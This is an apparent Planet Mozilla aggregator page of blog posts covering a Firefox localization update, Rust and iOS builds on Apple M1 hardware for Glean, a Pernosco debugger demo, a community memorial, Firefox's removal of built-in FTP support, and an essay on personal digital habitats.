For all localizers working on Firefox, there is now a Firefox L10n Newsletter, including all information regarding the next major release of Firefox (89, aka MR1). Here you can find the latest issue, and you can also subscribe to this thread in discourse to receive a message every time there’s an update.

One important update is that the Firefox 89 cycle will last 2 extra weeks in Beta. These are the important deadlines:

  • Firefox 89 will move from Nightly to Beta on April 19 (unchanged).
  • It will be possible to update localizations for Firefox 89 until May 23 (previously May 9).
  • Firefox 89 will be released on June 1.

As a consequence, the Nightly cycle for Firefox 90 will also be two weeks longer.

What’s new or coming up in mobile

Like Firefox desktop, Firefox for iOS and Firefox for Android are still on the road to the MR1 release. I’ve published some details on Discourse here. Dates and info are still relevant, nothing changes in terms of l10n.

All strings for Firefox for iOS should already have landed.

Most strings for Firefox for Android should have landed.

What’s new or coming up in web projects


The Voice Fill and Firefox Voice Beta extensions are being retired.

Common Voice:

The project is transitioning to the Mozilla Foundation. The announcement was made earlier this week. Some of the Mozilla staff who worked closely with the project will continue working on it in their new roles. The web part, which covers localization of the site, will remain in Pontoon.

Firefox Accounts:

Beta was launched on March 17. The sprint cycle is now aligned with Firefox Nightly moving forward. The next code push will be on April 21. The cutoff to include localized strings is a week earlier than the code push date.


All locales are disabled with the exception of fr, ja, zh-CN and zh-TW. There is a blog post on this decision. The team may add back more languages later. If it does happen, attribution for the work done by community members will be retained in Pontoon. Nothing will be lost.

  • Migration from .lang to .ftl has been completed. Strings containing brand and product names that were not converted properly will appear as warnings and will not be shown on the production site. Please resolve these issues as soon as possible.
  • A select few locales were chosen to be supported by a vendor service: ar, hi-IN, id, ja, and ms. The community managers were contacted about this change. The website should be fully localized in these languages by the first week of May. For more details on this change and for ways to report translation issues, please check out the announcement on Discourse.


  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Jan-Erik RedigerThis Week in Glean: rustc, iOS and an M1

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All "This Week in Glean" blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.

Back in February I got an M1 MacBook. That's Apple's new ARM-based hardware.

I got it with the explicit task to ensure that we are able to develop and build Glean on it. We maintain a Swift language binding, targeting iOS, and that one is used in Firefox iOS. Eventually these iOS developers will also have M1-based machines and want to test their code, thus Glean needs to work.

Here's what we need to get to work:

  • Compile the Rust portions of Glean natively on an M1 machine
  • Build & test the Kotlin & Swift language bindings on an M1 machine, even if non-native (e.g. Rosetta 2 emulation for x86_64)
  • Build & test the Swift language bindings natively and in the iPhone simulator on an M1 machine
  • Stretch goal: Get iOS projects using Glean running as well

Rust on an M1

Work on getting Rust compiled on M1 hardware started last year in June already, with the availability of the first developer kits. See Rust issue 73908 for all the work and details. First and foremost this required a new target: aarch64-apple-darwin. This landed in August and was promoted to Tier 2[1] with the December release of Rust 1.49.0.

By the time I got my MacBook, compiling Rust code on it was as easy as on an Intel MacBook. Developers on Intel MacBooks can cross-compile just as easily:

rustup target add aarch64-apple-darwin
cargo build --target aarch64-apple-darwin

Glean Python & Kotlin on an M1

Glean Python just ... worked. We use cffi to load the native library into Python. It gained aarch64[2] macOS support in v14.4.1. My colleague glandium later contributed support code so we build release wheels for that target too. So it's both possible to develop & test Glean Python, as well as use it as a dependency without having a full Rust development environment around.

Glean Android is not that straightforward. Some of our transitive dependencies are based on years-old pre-built binaries of SQLite and of course there's not much support behind updating those Java libraries. It's possible. A friend managed to compile and run that library on an M1. But for Glean development we simply recommend relying on Rosetta 2 (the x86_64 compatibility layer) for now. It's as easy as:

arch -x86_64 $SHELL
make build-kotlin

At least if you have Java set up correctly... The default Android emulator isn't usable on M1 hardware yet, but Google is working on a compatible one: Android M1 emulator preview. It's usable enough for some testing, but for that part I most often switch back to my Linux Desktop (that has the additional CPU power on top).

Glean iOS on an M1

Now we're getting to the interesting part: Native iOS development on an M1. Obviously for Apple this is a priority: Their new machines should become the main machine people do iOS development on. Thus Xcode gained aarch64 support in version 12 long before the hardware was available. That caused quite some issues with existing tooling, such as the dependency manager Carthage. Here's the issue:

  • When compiling for iOS hardware you would pick a target named aarch64-apple-ios, because ... iPhones and iPads are ARM-based since forever.
  • When compiling for the iOS simulator you would pick a target named x86_64-apple-ios, because conveniently the simulator uses the host's CPU (that's what makes it fast)

So when the compiler saw x86_64 and iOS it knew "Ah, simulator target" and when it saw aarch64 and ios it knew "Ah, hardware". And everyone went with this, Xcode happily built both targets and, if asked to, was able to bundle them into one package.

With the introduction of Apple Silicon[3], the iOS simulator running on these machines would also be aarch64[4], and also contain ios, but not be for the iOS hardware.

Now Xcode and the compiler would get confused about what to put where when building on M1 hardware for both iOS hardware and the host architecture.

So the compiler toolchain gained knowledge of a new thing: arm64-apple-ios14.0-simulator, explicitly marking the simulator target. The compiler knows from where to pick the libraries and other SDK files when using that target. You still can't put code compiled for arm64-apple-ios and arm64-apple-ios14.0-simulator into the same universal binary[5], because you can have each architecture only once (the arm64 part in there). That's what Carthage and others stumbled over.

Again Apple prepared for that: for a long time they have wanted you to use XCFramework bundles[6]. Carthage just didn't support that until the 0.37.0 release.

That still leaves Rust behind, as it doesn't know the new -simulator target. But as always the Rust community is ahead of the game and deg4uss3r started adding a new target in Rust PR #81966. He got halfway there when I jumped in to push it over the finish line. How these targets work and how LLVM picks the right things to put into the compiled artifacts is severely underdocumented, so I had to go the trial-and-error route in combination with looking at LLVM source code to find the missing pieces. Turns out: the 14.0 in arm64-apple-ios14.0-simulator is actually important.

With the last missing piece in place, the new Rust target landed in February and is available in Nightly. Contrary to the main aarch64-apple-darwin or aarch64-apple-ios target, the simulator target is not Tier 2 yet and thus no prebuilt support is available. A plain rustup target add aarch64-apple-ios-sim does not work right now. I am now in discussions to promote it to Tier 2, but it's currently blocked by the RFC: Target Tier Policy.

It works on nightly however and in combination with another cargo capability I'm able to build libraries for the M1 iOS simulator:

cargo +nightly build -Z build-std --target aarch64-apple-ios-sim

For now Glean iOS development on an M1 is possible, but requires Nightly. Goal achieved, I can actually work with this!

In a future blog post I want to explain in more detail how to teach Xcode about all the different targets it should build native code for.

All The Other Projects

This was marked a stretch goal for a reason. This involves all the other teams with Rust code and the iOS teams too. We're not there yet and there's currently no explicit priority to make development of Firefox iOS on M1 hardware possible. But when it comes to it, Glean will be ready for it and the team can assist others to get it over the finish line.

Want to hear more about Glean and our cross-platform Rust development? Come to next week's Rust Linz meetup, where I will be talking about this.



1: See Platform Support for what the Tiers mean.
2: The other name for that target.
3: "Apple Silicon" is yet another name for what is essentially the same as "M1" or "macOS aarch64".
4: Or arm64 for that matter. Yes, yet another name for the same thing.
5: "Universal Binaries" have existed for a long time now and allow one binary to include the compiled artifacts for multiple targets. It's how there's only one Firefox for Mac download which runs natively on either Mac platform.
6: Yup, the main documentation they link to is a WWDC 2019 talk recording video.

Data@MozillaThis Week in Glean: rustc, iOS and an M1

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index (and on the Mozilla Data blog).

Back in February I got an M1 MacBook. That’s Apple’s new ARM-based hardware.

I got it with the explicit task to ensure that we are able to develop and build Glean on it. We maintain a Swift language binding, targeting iOS, and that one is used in Firefox iOS. Eventually these iOS developers will also have M1-based machines and want to test their code, thus Glean needs to work.

Here’s what we need to get to work:

  • Compile the Rust portions of Glean natively on an M1 machine
  • Build & test the Kotlin & Swift language bindings on an M1 machine, even if non-native (e.g. Rosetta 2 emulation for x86_64)
  • Build & test the Swift language bindings natively and in the iPhone simulator on an M1 machine
  • Stretch goal: Get iOS projects using Glean running as well

Rust on an M1

Work on getting Rust compiled on M1 hardware started last year in June already, with the availability of the first developer kits. See Rust issue 73908 for all the work and details. First and foremost this required a new target: aarch64-apple-darwin. This landed in August and was promoted to Tier 21 with the December release of Rust 1.49.0.

By the time I got my MacBook compiling Rust code on it was as easy as on an Intel MacBook. Developers on Intel MacBooks can cross-compile just as easily:

rustup target add aarch64-apple-darwin
cargo build --target aarch64-apple-darwin

Glean Python & Kotlin on an M1

Glean Python just … worked. We use cffi to load the native library into Python. It gained aarch642 macOS support in v14.4.1. My colleague glandium later contributed support code so we build release wheels for that target too. So it’s both possible to develop & test Glean Python, as well as use it as a dependency without having a full Rust development environment around.

Glean Android is not that straight forward. Some of our transitive dependencies are based on years-old pre-built binaries of SQLite and of course there’s not much support behind updating those Java libraries. It’s possible. A friend managed to compile and run that library on an M1. But for Glean development we simply recommend relying on Rosetta 2 (the x86_64 compatibility layer) for now. It’s as easy as:

arch -x86_64 $SHELL
make build-kotlin

At least if you have Java set up correctly… The default Android emulator isn’t usable on M1 hardware yet, but Google is working on a compatible one: Android M1 emulator preview. It’s usable enough for some testing, but for that part I most often switch back to my Linux Desktop (that has the additional CPU power on top).

Glean iOS on an M1

Now we’re getting to the interesting part: Native iOS development on an M1. Obviously for Apple this is a priority: Their new machines should become the main machine people do iOS development on. Thus Xcode gained aarch64 support in version 12 long before the hardware was available. That caused quite some issues with existing tooling, such as the dependency manager Carthage. Here’s the issue:

  • When compiling for iOS hardware you would pick a target named aarch64-apple-ios, because … iPhones and iPads are ARM-based since forever.
  • When compiling for the iOS simulator you would pick a target named x86_64-apple-ios, because conveniently the simulator uses the host’s CPU (that’s what makes it fast)

So when the compiler saw x86_64 and iOS it knew “Ah, simulator target” and when it saw aarch64 and ios it knew “Ah, hardware”. And everyone went with this, Xcode happily built both targets and, if asked to, was able to bundle them into one package.

With the introduction of Apple Silicion3 the iOS simulator run on these machines would also be aarch644, and also contain ios, but not be for the iOS hardware.

Now Xcode and the compiler will get confused what to put where when building on M1 hardware for both iOS hardware and the host architecture.

So the compiler toolchain gained knowledge of a new thing: arm64-apple-ios14.0-simulator, explicitly marking the simulator target. The compiler knows from where to pick the libraries and other SDK files when using that target. You still can’t put code compiled for arm64-apple-ios and arm64-apple-ios14.0-simulator into the same universal binary5, because you can have each architecture only once (the arm64 part in there). That’s what Carthage and others stumbled over.

Again Apple prepared for that and for a long time they have wanted you to use XCFramework bundles6. Carthage just didn’t used to support that. The 0.37.0 release fixed that.

That still leaves Rust behind, as it doesn’t know the new -simulator target. But as always the Rust community is ahead of the game and deg4uss3r started adding a new target in Rust PR #81966. He got half way there when I jumped in to push it over the finish line. How these targets work and how LLVM picks the right things to put into the compiled artifacts is severly underdocumented, so I had to go the trial-and-error route in combination with looking at LLVM source code to find the missing pieces. Turns out: the 14.0 in arm64-apple-ios14.0-simulator is actually important.

With the last missing piece in place, the new Rust target landed in February and is available in Nightly. Unlike the main aarch64-apple-darwin or aarch64-apple-ios targets, the simulator target is not Tier 2 yet, and thus no prebuilt support is available. rustup target add aarch64-apple-ios-sim does not work right now. I am now in discussions to promote it to Tier 2, but it’s currently blocked by the RFC: Target Tier Policy.

It works on nightly however and in combination with another cargo capability I’m able to build libraries for the M1 iOS simulator:

cargo +nightly build -Z build-std --target aarch64-apple-ios-sim

For now Glean iOS development on an M1 is possible, but requires Nightly. Goal achieved, I can actually work with this!

In a future blog post I want to explain in more detail how to teach Xcode about all the different targets it should build native code for.

All The Other Projects

This was marked a stretch goal for a reason. This involves all the other teams with Rust code and the iOS teams too. We’re not there yet and there’s currently no explicit priority to make development of Firefox iOS on M1 hardware possible. But when it comes to it, Glean will be ready for it and the team can assist others to get it over the finish line.

Want to hear more about Glean and our cross-platform Rust development? Come to next week’s Rust Linz meetup, where I will be talking about this.


  1. See Platform Support for what the Tiers mean.↩︎
  2. The other name for that target.↩︎
  3. “Apple Silicon” is yet another name for what is essentially the same as “M1” or “macOS aarch64”.↩︎
  4. Or arm64 for that matter. Yes, yet another name for the same thing.↩︎
  5. “Universal Binaries” have existed for a long time now and allow for one binary to include the compiled artifacts for multiple targets. It’s how there’s only one Firefox for Mac download which runs natively on either Mac platform.↩︎
  6. Yup, the main documentation they link to is a WWDC 2019 talk recording video.↩︎

Robert O'CallahanDemoing The Pernosco Omniscient Debugger: Debugging Crashes In Node.js And GDB

This post was written by Pernosco co-founder Kyle Huey.

Traditional debugging involves forming a hypothesis about what is going wrong with the program, gathering evidence to accept or reject that hypothesis, and repeating until the root cause of the bug is found. This process is time-consuming, and formulating useful hypotheses often requires deep understanding of the software being debugged. With the Pernosco omniscient debugger there’s no need to speculate about what might have happened; instead an engineer can ask what actually did happen. This radically simplifies the debugging process, enabling much faster progress while requiring much less domain expertise.

To demonstrate the power of this approach we have two examples from well-known and complex software projects. The first is an intermittently crashing node.js test. From a simple stack walk it is easy to see that the proximate cause of the crash is calling a member function with a NULL `this` pointer. The next logical step is to determine why that pointer is NULL. In a traditional debugging approach, this requires pre-existing familiarity with the codebase, or reading code and looking for places where the value of this pointer could originate from. Then an experiment, either poking around in an interactive debugger or adding relevant logging statements, must be run to see where the NULL pointer originates from. And because this test fails intermittently, the engineer has to hope that the issue can be reproduced again and that this experiment doesn’t disturb the program’s behavior so much that the bug vanishes.

In the Pernosco omniscient debugger, the engineer just has to click on the NULL value. With all program state available at all points in time, the Pernosco omniscient debugger can track this value back to its logical origin with no guesswork on the part of the user. We are immediately taken backwards to the point where the connection in question received an EOF and set this pointer to NULL. You can read the full debugging transcript here.

Similarly, with a crash in gdb, the proximate cause of the crash is immediately obvious from a stack walk: the program has jumped through a bad vtable pointer to NULL. Figuring out why the vtable address has been corrupted is not trivial with traditional methods: there are entire tools such as ASAN (which requires recompilation) or Valgrind (which is very slow) that have been designed to find and diagnose memory corruption bugs like this. But in the Pernosco omniscient debugger a click on the object’s pointer takes the user to where it was assigned into the global variable of interest, and another click on the value of the vtable pointer takes the user to where the vtable pointer was erroneously overwritten. Walk through the complete debugging session here.

As demonstrated in the examples above, the Pernosco omniscient debugger makes it easy to track down even classes of bugs that are notoriously difficult to work with, such as race conditions or memory corruption errors. Try out Pernosco individual accounts or on-premises today!

About:CommunityIn loving memory of Ricardo Pontes

It brings us great sadness to share the news that a beloved Brazilian community member and Rep alumnus, Ricardo Pontes has recently passed away.

Ricardo was one of the first Brazilian community members, contributing for more than 10 years, a good friend, and a mentor to other volunteers.

His work was instrumental in the Firefox OS days and his passion inspiring. His passing finds us saddened and shocked. Our condolences to his family and friends.

Below are some words about Ricardo from fellow Mozillians (old and new)

  • Sérgio Oliveira (seocam): Everybody who knew Ricardo, or Pontes as we usually called him in the Mozilla community, knows that he had a strong personality (despite his actual height). He always stood for what he believed was right and fought for it, but always smiling, making jokes and playing around with the situations. He was a really fun partner in many situations, even the not-so-easy ones. We are lucky to have photos of Ricardo, since he was always behind the camera taking pictures of us, and always great pictures. Pontes, it was a great pleasure to defend the free Web side-by-side with you. I’ll miss you, my friend.
  • Felipe Gomes: Ricardo was always a cheerful, lively person who had the gift of bringing all groups together. Even during his struggle it was possible to see how people came together to pray for him and how dear he was to his friends and family. The memories we have of him are the memories he captured of us through his camera. Rest in peace, my friend.
  • Andrea Balle: Pontes is and always will be part of Mozilla Brazil. One of the first members, the “jurassic team” as we called it. Pontes was a generous, intelligent and high-spirited friend. I will always remember him as a person with great enthusiasm for sharing the things that he loved, including bikes, photography, technology and the free web. He will be deeply missed.
  • Armando Neto: I met Ricardo 10 years ago, in a hotel hallway. We were chatting about something I don’t remember, but I do remember we were laughing, and I will always remember him that way, in that hallway, laughing.
  • Luciana Viana: Ricardo was quiet and reserved, but he observed everything and was always attentive to what was going on. We met thanks to Mozilla and got to spend time together thanks to our countless trips: Buenos Aires, Cartagena, Barcelona, Toronto, trips made unforgettable by his presence, contributions and sense of humor. Rest in peace, dear Chuck. I pray that God comforts his family’s hearts.
  • Clauber Stipkovic: Thank you for everything, my friend. For all the laughter, for all the late nights we spent talking about Mozilla, about life and what we expected from the future. Thank you for being our photographer and recording so many cool moments that we spent together. Unfortunately your future was very short, but I am sure that you recorded your name in the history of everything you did. May your passage be smooth and peaceful.
  • Luigui Delyer (luiguild): Ricardo was present on the best days I have ever had in my life as a Mozillian. He taught me a lot, we enjoyed a lot, we traveled a lot, we taught a lot; his legacy is undeniable, his name will be forever in Mozilla’s history and in our hearts. May his family feel embraced by the entire world community that he helped to build.
  • Fabricio Zuardi: The memories I have of Ricardo are all of a person smiling, joyful and in high spirits. He left us wonderful records of happy moments. I wish comfort to his family and friends; he was a special person.
  • Guilermo Movia: I don’t remember the first time I met Ricardo, but there were so many meetings and travels where our paths crossed. I remember him coming to Mar del Plata to help us take pictures for the “De todos, para todos” campaign. His pictures were always great, and showed the best of the community. I hope you can rest in peace.
  • Rosana Ardila: Ricardo was part of the soul of the Mozilla Brazil community, he was a kind and wonderful human being. It was humbling to see his commitment to the Mozilla Community. He’ll be deeply missed
  • Andre Garzia: Ricardo has been a friend and my Reps mentor for many years; it was through him and others that I discovered the joys of volunteering in a community. His example, wit, and smile were always part of what made our community great. Ricardo has been an inspiring figure for me, not only because of the love of the web that ties us all here, but because he followed his passions and showed me that it was possible to pursue a career in what we loved. He loved photography, biking, and punk music, and that is how I chose to remember him. I’ll always cherish the memories we had travelling the world and exchanging stories. My heart and thoughts go to his beloved partner and family. I’ll miss you a lot, my friend.
  • Lenno Azevedo: Ricardo was my second mentor in the Mozilla Reps program, where he guided me through the project, showing me the ropes and helping me become a good Rep. I will keep forever the lessons and encouragement he gave me over the years, especially in my current profession. I owe you one, partner. Thank you for everything, rest in peace!
  • Reuben Morais: Ricardo was a beautiful soul, full of energy and smiles. Meeting him at events was always an inspiring opportunity. His energy always made every gathering feel like we all knew each other as childhood friends, I remember feeling this even when I was new. He’ll be missed by all who crossed paths with him.
  • Rubén Martín (nukeador): Ricardo was key in supporting the Mozilla community in Brazil. As a creative mind he was always behind his camera, trying to capture and communicate what was going on; his work online will keep his memory alive. A great memory comes to my mind of the time we shared back in 2013, presenting Firefox OS to the world from Barcelona’s Mobile World Congress. You will be deeply missed. All my condolences to his family and close friends. Thank you for everything, rest in peace!
  • Pierros Papadeas: A creative and kind soul, Ricardo will be surely missed by the communities he engaged so passionately.
  • Gloria Meneses: Taking amazing photos, skating and supporting his local community: that’s how I remember Ricardo, a very active Mozillian who loved parties after long Reps working sessions, and a beer lover. The most special memories I have of Ricardo are in Cartagena at the Firefox OS event, in Barcelona at Mobile World Congress taking photos, in Madrid at Reps meetings and in the IRC channel supporting Mozilla Brazil. I still can’t believe it. Rest in peace, Ricardo.
  • William Quiviger: I remember Ricardo being very soft-spoken and gentle, but fiercely passionate about Mozilla and our mission. I remember his eyes lighting up when I approached him about joining the Reps program. Rest in peace, Ricardo.
  • Fernando García (stripTM): I am very shocked by this news. It is so sad and so unfair.
  • Mário Rinaldi: Ricardo was a cheerful and jovial person; he will be greatly missed in this world.
  • Lourdes Castillo:  I will always remember Ricardo as a friend and brother who has always been dedicated to the Mozilla community. A tremendous person with a big heart. A hug to heaven and we will always remember you as a tremendous Mozillian and brother! Rest in peace my mozfriend
  • Luis Sánchez (lasr21): The legacy of Ricardo’s passions will live on through the hundreds of new contributors that his work reached.
  • Miguel Useche: Ricardo was one of the first Mozillians I met outside my country. It was interesting to know someone who volunteered at Mozilla, did photography and loved skateboarding, just like me! I became a fan of his art and loved the few times I had the opportunity to share with him. Rest in peace, bro!
  • Antonio Ladeia: Ricardo was a special guy, always happy and willing to help. I had the pleasure of meeting him. His death will make this world a little sadder.
  • Eduardo Urcullú (Urcu): Ricardo, better known as “O Pontes”, really was a very fun friend, though quiet until you got to know him well. I met him at a free software event back in 2010 (when I still had long hair xD). The photos he took with his camera and his situational humor are things to remember him by. R.I.P. Pontes
  • Dave Villacreses (DaveEcu): Ricardo was part of the early group of supporters here in Latin America; he contributed to breathing life into our beloved Latam community. I remember he loved photography and was always full of ideas and interesting comments. Smart and proactive. It is a really sad moment for our entire community.
  • Arturo Martinez: I met Ricardo during MozCamp LATAM, and since then we became good friends. Our paths crossed several times during events, flights, even at the MWC. He was an amazing Mozillian, always making us laugh, taking impressive pictures, with the willpower to defend what he believed in, with few words but lots of passion. Please rest in peace, my friend.
  • Adriano Cupello: The first time we met, we were in Cartagena for the launch of Firefox OS, and I met one of the most amazing groups of people of my life. Pontes was one of them and very quickly became an “old friend”, like the ones we have known from school all our lives. He was an incredible and strong character and a great photographer. He was also my mentor in the Mozilla Reps program. The last time we talked, we tried to have a beer, but due to work circumstances we were unable to. We scheduled it for the next time, and this time never came. This week I will have this beer thinking about him. I would like to invite all of you, at the next beer you have with your friends or alone, to dedicate it to his memory and to the great moments we spent together with him. My condolences and my prayers to his family and his partner @cahcontri, who fought a very painful battle to report his situation until the last day with all his love. Thank you for all the lovely memories you left in my mind! We will miss you a lot! Cheers, Pontes!
  • Rodrigo Padula: There were so many events, beers, good conversations and so many jokes and laughs that I don’t even remember when I met Ricardo. We shared the same sense of humor and bad jokes. Surely only good memories will remain! Rest in peace, Ricardo, we will miss you!
  • Brian King: I was fortunate to have met Ricardo several times. Although quiet, you felt his presence and he was a very cool guy. We’ll miss you, I hope you get that big photo in the sky. RIP Ricardo.

Some pictures of Ricardo’s life as a Mozilla contributor can be found here

Mozilla Addons BlogBuilt-in FTP implementation to be removed in Firefox 90

Last year, the Firefox platform development team announced plans to remove the built-in FTP implementation from the browser. FTP is a protocol for transferring files from one host to another.

The implementation is currently disabled in the Firefox Nightly and Beta pre-release channels and will be disabled in the release channel when Firefox 88 ships on April 19, 2021. The implementation will be removed entirely in Firefox 90. After FTP is disabled in Firefox, the browser will delegate ftp:// links to external applications in the same manner as other protocol handlers.

With the deprecation, browserSettings.ftpProtocolEnabled will become read-only. Attempts to set this value will have no effect.

Most places where an extension may pass “ftp”, such as filters for proxy or webRequest, should not result in an error, but the APIs will no longer handle requests of those types.

To help offset this removal, ftp has been added to the list of supported protocol_handlers for browser extensions. This means that extensions will be able to prompt users to launch an FTP application to handle certain links.
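As a sketch of what this enables (the extension name and URL below are illustrative, not from the post), an extension could register an ftp handler through the protocol_handlers manifest key:

```json
{
  "name": "Hypothetical FTP Helper",
  "version": "1.0",
  "manifest_version": 2,
  "protocol_handlers": [
    {
      "protocol": "ftp",
      "name": "My FTP helper",
      "uriTemplate": "https://example.com/open?url=%s"
    }
  ]
}
```

When the user opts in, clicking an ftp:// link hands the full URL to the handler via the %s placeholder in uriTemplate.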

Please let us know if you have any questions on our developer community forum.

The post Built-in FTP implementation to be removed in Firefox 90 appeared first on Mozilla Add-ons Blog.

Ryan HarterOpportunity Sizing: Is the Juice Worth the Squeeze?

My peers at Mozilla are running workshops on opportunity sizing. If you're unfamiliar, opportunity sizing is when you take some broad guesses at how impactful some new project might be before writing any code. This gives you a rough estimate of what the upside for this work might be.

The …

Alex GibsonMy eighth year working at Mozilla

What will 2020 bring? Your guess is as good as mine. My hope is it can only get better from here.

Fucking. Hell.

Well, that was the most short-sighted and optimistic take ever, eh? It feels like a decade since I wrote that, and a world away from where we all stand today. I would normally write a post on this day to talk about some of the work that I’ve been doing at Mozilla over the past 12 months, but that seems kinda insignificant right now. The global pandemic has hit the world hard, and while we’re slowly starting to recover, it’s going to be a long process. Many businesses worldwide, including Mozilla, felt the direct impact of the pandemic. I count myself fortunate to still have a stable job, and to be able to look after my family during this time. We’re all still healthy, and that’s all that really matters right now.

One thing that’s kept me going over the past year is seeing just how much people can come together to help and support each other. Family, friends, colleagues, management at work - have all been amazing. And as difficult as my kids have found the last 12 months, it motivates me to see them continue to bring enthusiasm to the world. No matter what’s happening that day, they can always cheer me up.

So I’m going to leave this short and just say: stay safe. It’s going to be a truly global effort to get through this. Afterward, there will likely be a new definition of “normal”. But I have hope that we are going to get there.

Allen Wirfs-BrockPersonal Digital Habitats

In early 2013 I wrote the blog post Ambient Computing Challenge: Please Abstract My Digital Life. In it I lamented about the inessential complexity we all encounter living with a multitude of weakly integrated digital devices and services:

I simply want to think about all my “digital stuff” as things that are always there and always available.  No matter where I am or which device I’m using.

… My attention should always be on “my stuff.”  Different devices and different services should fade into the background.

In the eight years since I wrote that blog post not much has changed in how we think about and use our various devices. Each device is still a world unto itself. Sure, there are cloud applications and services that provide support for coordinating some of “my stuff” among devices. Collaborative applications and sync services are more common and more powerful—particularly if you restrict yourself to using devices from a single company’s ecosystem. But my various devices and their idiosyncratic differences have not “faded into the background.”

Why haven’t we done better? A big reason is conceptual inertia. It’s relatively easy for software developers to imagine and implement incremental improvements to the status quo. But before developers can create an innovative new system (or users can ask for one) they have to be able to envision it and have a vocabulary for talking about it. So, I’m going to coin a term, Personal Digital Habitat, for an alternative conceptual model for how we could integrate our personal digital devices. For now, I’ll abbreviate it as PDH because each of the individual words is important. However, if it catches on I suspect we will just say habitat, digihab, or just hab.

A Personal Digital Habitat is a federated multi-device information environment within which a person routinely dwells. It is associated with a personal identity and encompasses all the digital artifacts (information, data, applications, etc.) that the person owns or routinely accesses. A PDH overlays all of a person’s devices1 and they will generally think about their digital artifacts in terms of common abstractions supported by the PDH rather than device- or silo-specific abstractions. But presentation and interaction techniques may vary to accommodate the physical characteristics of individual devices.

People will think of their PDH as the storage location of their data and other digital artifacts. They should not have to think about where among their devices the artifacts are physically stored. A PDH is responsible for making sure that artifacts are available from each of its federated devices when needed. As a digital repository, a PDH should be a “local-first software” system, meaning that it conforms to:

… a set of principles for software that enables both collaboration and ownership for users. Local-first ideals include the ability to work offline and collaborate across multiple devices, while also improving the security, privacy, long-term preservation, and user control of data.

Martin Kleppmann, Adam Wiggins, Peter van Hardenberg, and Mark McGranaghan. Local-first software: you own your data, in spite of the cloud. 2019 ACM SIGPLAN International Symposium on New Ideas, New Paradigms, and Reflections on Programming and Software (Onward!), October 2019, pages 154–178. doi:10.1145/3359591.3359737

There is one important difference between my concept of a PDH and what Kleppmann, et al. describe. They talk about the need to “synchronize” a user’s data that may be stored on multiple devices, and this will certainly be a fundamental (and hopefully transparent) service provided by a PDH. But they also talk at length about multi-user collaboration where simultaneous editing may occur. With every person having their own PDH, support for inter-PDH collaborative editing will certainly be important. But I think focusing on multi-user collaboration is a distraction from the personal nature of a PDH. The design of a PDH should optimize for intra-PDH activities. At any point in time, a person’s attention is generally focused on one thing. We will rarely make simultaneous edits to a single digital artifact from multiple devices federated into our PDHs. But we will rapidly shift our attention (and our editing behaviors) among our devices. Tracking intra-PDH attention shifts is likely to be useful for intra-PDH data synchronization. I’m intrigued with understanding how we might use explicit attention shifts such as touching a keyboard or picking up a tablet as clues about user intent.

So let’s make this all a little more concrete by stepping through a usage scenario. Assume that I’m sitting at my desk, in front of a large display2. Also sitting on the desk are a laptop and a tablet with a stylus, and a “phone” is in my pocket. These devices are all federated parts of my PDH. Among other things, this means that I have access to the same artifacts from all the devices and that I can frictionlessly switch among them.

  1. Initially, I’m typing formatted text into an essay that is visible on the desktop display.
  2. I pick up the tablet. The draft essay with the text I just typed is visible.
  3. I use the stylus to drag apart two paragraphs creating a drawing area and then make a quick block diagram. As I draw on the tablet, the desktop display also updates with the diagram.
  4. As I look at my drawing in context, I notice a repeated word in the preceding paragraph so I use a scratch-out gesture to delete the extra word. That word disappears from the desktop display.
  5. I put down the tablet, shift my attention back to the large display, and use a mouse and keyboard to select items in the diagram and type labels for them. If I glance at the tablet, I will see the labels.
  6. Shifting back to tablet, I use the stylus to add a couple of missing lines to the diagram.
  7. Suddenly, the desktop speaker announces, “Time to walk to the bus stop, meeting with Erik at Starbucks in 30 minutes.” The announcement might have come from any of the devices; the PDH software is aware of the proximity of my devices and makes sure only one speaks the alert.
  8. I put the laptop into my bag, check that I have my phone, and head to the bus stop.
  9. I walk fast and when I get to the bus stop I see on my phone that the bus won’t arrive for 5 minutes.
  10. From the PDH recent activities list on the phone I open the draft essay and reread what I recently wrote and attach a voice note to one of the paragraphs.
  11. Later, after the meeting, I stay at Starbucks for a while and use the laptop to continue working on my essay, following the suggestions in the voice notes I made at the bus stop.
  12. …and life goes on in my Personal Digital Habitat…
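The attention-shift idea running through the scenario above can be sketched as a toy model (all names invented; this is not a real system): the habitat treats a device gaining focus as the cue to bring that device’s replica up to date before it is used.

```python
# Toy model (invented names, not a real PDH implementation): a habitat that
# replicates the latest artifact state to whichever device gains focus.
class Habitat:
    def __init__(self, devices):
        self.artifacts = {}                       # canonical state: name -> content
        self.replicas = {d: {} for d in devices}  # per-device copies

    def edit(self, device, name, content):
        # An edit on the focused device updates the canonical state.
        self.artifacts[name] = content
        self.replicas[device][name] = content

    def focus(self, device):
        # An explicit attention shift (picking up the tablet, touching the
        # keyboard) is the cue to sync that device before input continues.
        self.replicas[device] = dict(self.artifacts)
        return self.replicas[device]

hab = Habitat(["desktop", "tablet", "phone"])
hab.edit("desktop", "essay", "typed text")
# Picking up the tablet shows the text just typed on the desktop.
assert hab.focus("tablet")["essay"] == "typed text"
hab.edit("tablet", "essay", "typed text + diagram")
# Shifting attention back to the desktop shows the tablet's additions.
assert hab.focus("desktop")["essay"] == "typed text + diagram"
```

A real habitat would need conflict resolution (e.g. CRDTs, as in the local-first literature cited above); this sketch only illustrates using focus changes as sync points.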

Personal Digital Habitat is an aspirational metaphor. Such metaphors have had an important role in the evolution of our computing systems. In the 1980s and 90s it was the metaphor of a virtual desktop with direct manipulation of icons corresponding to metaphorical digital artifacts that made personal computers usable by a majority of humanity. Since then we added additional metaphors such as clouds, webs, and stores that sell apps. But our systems still primarily work in terms of one person using one physical “computer” at a time—even though many of us, in a given day, frequently switch our attention among multiple computers. Personal Digital Habitat is a metaphor that can help us imagine how to unify all our computer-based personal devices and simplify our digital lives.

